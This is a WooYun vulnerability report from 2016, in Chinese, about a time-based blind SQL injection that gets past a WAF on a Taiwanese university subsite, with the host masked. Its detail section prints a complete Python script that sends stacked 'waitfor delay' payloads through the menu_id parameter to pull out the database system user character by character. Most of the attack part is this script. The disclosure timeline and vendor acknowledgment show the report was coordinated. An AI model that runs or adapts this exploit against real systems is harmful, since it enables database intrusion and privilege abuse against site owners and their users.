漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0167169
漏洞标题:绕过waf继续注入之世新大学某分站#2(确认是SA权限)(臺灣地區)
相关厂商:台湾省世新大学
漏洞作者: 404notfound
提交时间:2016-01-04 16:36
修复时间:2016-02-20 15:48
公开时间:2016-02-20 15:48
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-01-04: 细节已通知厂商并且等待厂商处理中
2016-01-08: 厂商已经确认,细节仅向厂商公开
2016-01-18: 细节向核心白帽子及相关领域专家公开
2016-01-28: 细节向普通白帽子公开
2016-02-07: 细节向实习白帽子公开
2016-02-20: 细节向公众公开
简要描述:
都特么是waf,还能不能玩了,人与人之间信任哪去了
详细说明:
不知道这分站叫什么名字,直接上注入点
http://**.**.**.**/CareerGuide/FrontShow/paper_display.aspx?menu_id=5&submenu_id=413&apmenu_id=1598
参数menu_id可绕过继续注入
这里不存在之前那个漏洞注释单引号导致python脚本不能使用的问题,直接上脚本
import requests
import re
import time
payloads='abcdefghigklmnopqrstuvwxyz0123456789@_.'
user=''
print 'Start to retrive Mysql user:'
for i in range(1,30):
for payload in payloads:
starttime=time.time()
s="5;if(ascii(substring(system_user,%s,1)))=%s waitfor delay '0:0:3' --" %(i,ord(payload))
param={'menu_id':s,'submenu_id':413,'apmenu_id':1598}
response=requests.get('http://**.**.**.**/CareerGuide/FrontShow/paper_display.aspx',params=param)
if time.time()-starttime >3:
user+=payload
print '\n user is:',user,
break
else:
print '.',
print '\n[Done] mysql user is %s' %user
漏洞证明:
修复方案:
我想看看你们给20rank乌云会给我多少,难道是<20,乌云都是只给我4rank
版权声明:转载请注明来源 404notfound@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:16
确认时间:2016-01-08 03:27
厂商回复:
感謝通報
最新状态:
暂无